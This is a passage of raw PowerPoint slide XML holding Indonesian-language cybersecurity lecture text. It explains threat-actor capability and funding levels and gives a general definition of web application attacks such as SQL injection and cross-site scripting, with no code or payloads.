              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>canggih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mampu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komoditas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Aktor yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mampu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disematkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>politik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>militer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Daya/Pendanaan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>canggih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disesuaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ahli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insinyur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terampil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mampu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> negara dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kejahatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terorganisir</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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="51398066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Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Karakteristik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> input yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buruk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengarah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>injeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
